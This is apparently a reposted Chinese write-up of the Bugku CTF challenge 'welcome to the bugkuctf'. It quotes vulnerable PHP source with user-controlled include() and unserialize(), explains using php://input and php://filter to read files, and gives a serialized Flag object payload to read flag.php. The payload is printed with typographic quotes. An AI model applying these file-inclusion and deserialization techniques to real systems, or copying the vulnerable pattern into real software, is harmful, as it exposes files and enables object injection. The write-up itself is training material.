php://filter的利用 bugku welcome to the bugkuctf
阿新 • • 發佈:2018-12-15
題目:welcome to the bugkuctf 網頁連結
題目描述:檢視原始碼可以發現
<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>"; include($file); //hint.php }else{ echo "you are not admin ! "; } -->
我們需要傳入三個引數
1.user不能為空且讀取內容為welcome to the bugkuctf
2.file需要訪問到hint.php
3.pass沒有用到
利用php://input與php://filter傳入引數
<?php class Flag{//flag.php public $file; public function __tostring(){ if(isset($this->file)){ echo file_get_contents($this->file); echo "<br>"; return ("good"); } } } ?>
把hint.php修改成index.php,得到
<?php $txt = $_GET["txt"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($txt)&&(file_get_contents($txt,'r')==="welcome to the bugkuctf")){ echo "hello friend!<br>"; if(preg_match("/flag/",$file)){ echo "不能現在就給你flag哦"; exit(); }else{ include($file); $password = unserialize($password); echo $password; } }else{ echo "you are not the number of bugku ! "; } ?> <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>"; include($file); //hint.php }else{ echo "you are not admin ! "; } -->
根據程式碼分析我們給pass傳入一個Flag類,構造序列化物件payload為O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;} file為hint.php得到flag